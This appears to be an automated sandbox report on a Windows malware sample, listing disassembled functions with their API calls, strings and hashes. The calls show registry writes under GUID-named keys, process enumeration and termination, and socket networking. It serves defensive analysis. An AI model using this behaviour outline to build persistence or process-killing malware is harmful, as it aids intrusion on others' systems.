                                                                            • _memset.LIBCMT ref: 007DACFB
                                                                            • RegisterClassW.USER32(?), ref: 007DAD1E
                                                                            • GetLastError.KERNEL32 ref: 007DAD30
                                                                            • CreateWindowExW.USER32(00000000,{6E456649-C3EE-4FD5-A6F9-EDD17ADE88F3},007F705C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007DAD64
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DAD87
                                                                            • TranslateMessage.USER32(?), ref: 007DAD95
                                                                            • DispatchMessageW.USER32(?), ref: 007DAD9F
                                                                            • DestroyWindow.USER32(00000000), ref: 007DADAD
                                                                            • UnregisterClassW.USER32({6E456649-C3EE-4FD5-A6F9-EDD17ADE88F3},00000000), ref: 007DADC5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister_memset
                                                                            • String ID: {6E456649-C3EE-4FD5-A6F9-EDD17ADE88F3}
                                                                            • API String ID: 1736019982-2008418920
                                                                            • Opcode ID: 89e84cc7565993987608a723c604465cc6773f30ab34953ca4a167fd1124e1a3
                                                                            • Instruction ID: 2a090287953ab0f70df21ba056926cd9ebfdec73e5e75f191cdf99d274bf9a0d
                                                                            • Opcode Fuzzy Hash: 89e84cc7565993987608a723c604465cc6773f30ab34953ca4a167fd1124e1a3
                                                                            • Instruction Fuzzy Hash: 22218E71A41308FBD704DFA0EC49BAE7B75FB48702F008419F601A72E1DBB8A905DB69
                                                                            Function 007D76F0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72windowregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 007D76F8
                                                                            • _memset.LIBCMT ref: 007D770B
                                                                            • RegisterClassW.USER32(?), ref: 007D772E
                                                                            • GetLastError.KERNEL32 ref: 007D7740
                                                                            • CreateWindowExW.USER32(00000000,{E5AC99DD-1415-4022-BE6C-AB9045565FB3},007F49E4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D7774
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007D7797
                                                                            • TranslateMessage.USER32(?), ref: 007D77A5
                                                                            • DispatchMessageW.USER32(?), ref: 007D77AF
                                                                            • DestroyWindow.USER32(00000000), ref: 007D77BD
                                                                            • UnregisterClassW.USER32({E5AC99DD-1415-4022-BE6C-AB9045565FB3},00000000), ref: 007D77D5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister_memset
                                                                            • String ID: {E5AC99DD-1415-4022-BE6C-AB9045565FB3}
                                                                            • API String ID: 1736019982-4116564367
                                                                            • Opcode ID: 6c60ef491a39b80d826a4f7264353d76b4289c1a3017370afadc198f7b703f8e
                                                                            • Instruction ID: f6397d2049797089a2665731d830e3a3ac8547db2467677c30d453491fa6d731
                                                                            • Opcode Fuzzy Hash: 6c60ef491a39b80d826a4f7264353d76b4289c1a3017370afadc198f7b703f8e
                                                                            • Instruction Fuzzy Hash: E7213075944204EFD704DFA0DC49FAD7B75FB88711F10881AE605B6290EBB85946CB64
                                                                            Function 007C9EE0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 60registrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C9F00
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007C9F16
                                                                            • __snwprintf.LIBCMT ref: 007C9F3A
                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007C9F55
                                                                            • lstrlenW.KERNEL32(?), ref: 007C9F66
                                                                            • RegSetValueExW.ADVAPI32(?,{73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8},00000000,00000001,?,00000002), ref: 007C9F88
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C9F99
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C9FAD
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007C9F24
                                                                            • {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}, xrefs: 007C9F7C
                                                                            • SOFTWARE\%s, xrefs: 007C9F29
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$FileModuleNameOpenValue__snwprintf_memsetlstrlen
                                                                            • String ID: SOFTWARE\%s${73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 1214033602-923683513
                                                                            • Opcode ID: 7f0e830452b5619d740b34fdacd2187c23a5385a106d78d06a90c9860de30874
                                                                            • Instruction ID: 247040fc093d3e2515e4432c0443bc6430c1911d9ae7959a08cadee643af619c
                                                                            • Opcode Fuzzy Hash: 7f0e830452b5619d740b34fdacd2187c23a5385a106d78d06a90c9860de30874
                                                                            • Instruction Fuzzy Hash: DB11CBB5A00304ABD764DB70DC4DFE67378AB84B00F004A8CB719D6191EAB49A84CFA1
                                                                            Function 007C9CE0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowsDirectoryW.KERNEL32(8U|,00000104,?,007C5538,00000000), ref: 007C9CF2
                                                                            • __snwprintf.LIBCMT ref: 007C9D0E
                                                                            • GetSystemDirectoryW.KERNEL32(8U|,00000104), ref: 007C9D2E
                                                                            • __snwprintf.LIBCMT ref: 007C9D4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Directory__snwprintf$SystemWindows
                                                                            • String ID: %s\CMD.EXE$%s\EXPLORER.EXE$%s\SVCHOST.EXE$8U|
                                                                            • API String ID: 2322266053-681786168
                                                                            • Opcode ID: c826741fe83a472d551fcc5149b2c12aeb10c89e425b46d51aad2fa89cbbacb7
                                                                            • Instruction ID: 6f5ab83f8b5a68265d98428f30c2e5769c57a93a8ff1335c7f3c155da4c6d4ca
                                                                            • Opcode Fuzzy Hash: c826741fe83a472d551fcc5149b2c12aeb10c89e425b46d51aad2fa89cbbacb7
                                                                            • Instruction Fuzzy Hash: CB1112B1740344ABEF44EE64CC8DFBA3765AB44700F14481DFB1AAF280DAB8D990D751
                                                                            Function 007C6E80 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 230synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007C6EEB
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C702F
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C7073
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C70B5
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C7117
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C71A5
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C723B
                                                                            • closesocket.WS2_32(?), ref: 007C7245
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                              • Part of subcall function 007E0950: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleInfoLocale___crt$EventFreeObjectSingleVirtualWaitclosesocketsetsockoptshutdown
                                                                            • String ID: d
                                                                            • API String ID: 3427925336-2564639436
                                                                            • Opcode ID: 6ff8b026cc846954afe03c5cd875596052a6430b2f53918e42d29c7a3098174c
                                                                            • Instruction ID: 86d772607899f4f85170c29d420fee298090229e5ba9b589db94f5d94431581d
                                                                            • Opcode Fuzzy Hash: 6ff8b026cc846954afe03c5cd875596052a6430b2f53918e42d29c7a3098174c
                                                                            • Instruction Fuzzy Hash: 35A14F71A00218DFEB28DF64CC85FAEB775FB94304F14829CE119AB292DB759A85CF50
                                                                            Function 007D74B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000,?,007D720B,?), ref: 007D74EB
                                                                            • CloseHandle.KERNEL32(00000000,?,007D720B,?), ref: 007D7523
                                                                            • CloseHandle.KERNEL32(00000000,?,007D720B,?), ref: 007D7543
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,007D720B,?), ref: 007D755B
                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 007D757A
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D75A8
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D75BE
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D75C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$CreateThread$EventObjectResumeSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 144976343-2564639436
                                                                            • Opcode ID: 174e60fb56173311ee9e096a50e74d57e038eb9a64d7b917a547bdddf3382e2f
                                                                            • Instruction ID: e3c1375f35896b75b75bbb0429f50ccbe2c039f904cf4d506766bc8a24cb9782
                                                                            • Opcode Fuzzy Hash: 174e60fb56173311ee9e096a50e74d57e038eb9a64d7b917a547bdddf3382e2f
                                                                            • Instruction Fuzzy Hash: 6E4129B4A04219DFDB04CF94D888BAEBBB1FB48304F24C549E516A7391D779D981CF91
                                                                            Function 007CFE20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83stringmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                            • lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                            • lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                            • __snwprintf.LIBCMT ref: 007CFEDA
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007CFF04
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$FreeTask$AllocFolderKnownLocalPath__snwprintf
                                                                            • String ID: %s\%s\
                                                                            • API String ID: 3447735180-2168696002
                                                                            • Opcode ID: be12cd56a6b32aadb0bf44660bef6f5192ecfb77bc8c1c5e6ba510fafd571e9f
                                                                            • Instruction ID: d31f1d419fe86e2b7af13551a36bf281acbd7e1d34d758e942e10f8ad00cf065
                                                                            • Opcode Fuzzy Hash: be12cd56a6b32aadb0bf44660bef6f5192ecfb77bc8c1c5e6ba510fafd571e9f
                                                                            • Instruction Fuzzy Hash: 9631DAB5E00209EFCB04DFA8D885EAEBBB5FF88304F148559E905A7351D734A941CFA4
                                                                            Function 007C2490 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 67processstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C24A4
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007C24CC
                                                                            • lstrcmpiW.KERNEL32(?,-00832F28), ref: 007C251A
                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 007C253C
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 007C255A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C2567
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 007C257F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C2591
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                                                            • String ID: A#v
                                                                            • API String ID: 1193533834-4158731453
                                                                            • Opcode ID: ee4f0d72e1cbe6b1434c8127ecd3c90be7997c778cf51a79f3cc1b6ff27f35b6
                                                                            • Instruction ID: cd652db43d51fdacfda2dcaffbf232749e4ce0145e114f13d9c0cc06ae5b26cd
                                                                            • Opcode Fuzzy Hash: ee4f0d72e1cbe6b1434c8127ecd3c90be7997c778cf51a79f3cc1b6ff27f35b6
                                                                            • Instruction Fuzzy Hash: AD21EA75901218DBDB24DF60DD9CBAABB78FB84700F2046DCE509A6291D7789F81DF50
                                                                            Function 007E2030 Relevance: 15.3, APIs: 10, Instructions: 294stringnetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?), ref: 007E2049
                                                                              • Part of subcall function 007E2450: CoInitialize.OLE32(00000000), ref: 007E2466
                                                                              • Part of subcall function 007E2450: CoCreateGuid.COMBASE(c ~), ref: 007E2478
                                                                              • Part of subcall function 007E2450: StringFromGUID2.COMBASE(c ~,?,00000027), ref: 007E2490
                                                                              • Part of subcall function 007E2450: wsprintfA.USER32 ref: 007E24AB
                                                                              • Part of subcall function 007E2450: LocalAlloc.KERNEL32(00000040,00000068), ref: 007E24B8
                                                                              • Part of subcall function 007E2450: und_memcpy.LIBCMTD ref: 007E2505
                                                                              • Part of subcall function 007E2450: LocalFree.KERNEL32(00000000), ref: 007E2511
                                                                              • Part of subcall function 007E2450: CoUninitialize.COMBASE ref: 007E2517
                                                                              • Part of subcall function 007DFFF0: socket.WS2_32(00000002,00000001,00000006), ref: 007DFFFF
                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000080,?,00000004), ref: 007E20F0
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E2428
                                                                              • Part of subcall function 007E0950: WSACreateEvent.WS2_32 ref: 007E09B0
                                                                              • Part of subcall function 007E2530: LocalAlloc.KERNEL32(00000040,00000318), ref: 007E2540
                                                                              • Part of subcall function 007E2530: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 007E2558
                                                                              • Part of subcall function 007E2530: LocalFree.KERNEL32(00000000), ref: 007E256B
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007E23B3
                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000020), ref: 007E23D8
                                                                            • und_memcpy.LIBCMTD ref: 007E23F7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E240E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E241B
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E2437
                                                                            • closesocket.WS2_32(00000000), ref: 007E2444
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                              • Part of subcall function 007E0950: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
                                                                              • Part of subcall function 007E0CD0: WSACreateEvent.WS2_32 ref: 007E0D30
                                                                              • Part of subcall function 007E26F0: LocalAlloc.KERNEL32(00000040,00000280), ref: 007E2700
                                                                              • Part of subcall function 007E26F0: lstrcpyW.KERNEL32(0000001C,CPU001), ref: 007E2735
                                                                              • Part of subcall function 007E26F0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007E2754
                                                                              • Part of subcall function 007E26F0: LocalFree.KERNEL32(00000020), ref: 007E2762
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$CreateEvent$Alloc$InfoLocale___crtund_memcpy$CloseFileFromGuidHandleInitializeLibraryLoadModuleNameSelectStringUninitializeclosesocketlstrcpylstrlensetsockoptshutdownsocketwsprintf
                                                                            • String ID:
                                                                            • API String ID: 3642594451-0
                                                                            • Opcode ID: a04954232137ddadfcc9cde9962d84a368301a9696dc71c735cd71def1820828
                                                                            • Instruction ID: 55c652746c67a441223f146762280bf117e0fa1ac7e07b187bdae3710f7d8122
                                                                            • Opcode Fuzzy Hash: a04954232137ddadfcc9cde9962d84a368301a9696dc71c735cd71def1820828
                                                                            • Instruction Fuzzy Hash: B5B17FB5A00358AFEB24DB95CC45FEE7379AB48700F504598F608A71C2E7B46E85CF62
                                                                            Function 007CB3E0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61registrytimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007CB3FF
                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007CB426
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007CB438
                                                                            • _memset.LIBCMT ref: 007CB446
                                                                            • GetSystemTime.KERNEL32(?), ref: 007CB465
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 007CB476
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007CB3E9
                                                                            • SOFTWARE\%s, xrefs: 007CB3EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Time$System$CloseCreateFile__snwprintf_memset
                                                                            • String ID: SOFTWARE\%s${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3491885642-1408172494
                                                                            • Opcode ID: 3a61c4eaa340324650045c2b8fa0fa0b5810f8cad64558505493c9390c8920fc
                                                                            • Instruction ID: 0298569d9dbc013d386938e229e6d6dc6dbd0cb793c42b874afb7e5398e3bede
                                                                            • Opcode Fuzzy Hash: 3a61c4eaa340324650045c2b8fa0fa0b5810f8cad64558505493c9390c8920fc
                                                                            • Instruction Fuzzy Hash: 29115471A44309BAEB14DBB09C4BFFA732CAB54704F40095CBA15E6182FBB9975487A1
                                                                            Function 007C4650 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C4670
                                                                            • __snwprintf.LIBCMT ref: 007C468E
                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,000017FC,00000000), ref: 007C46B5
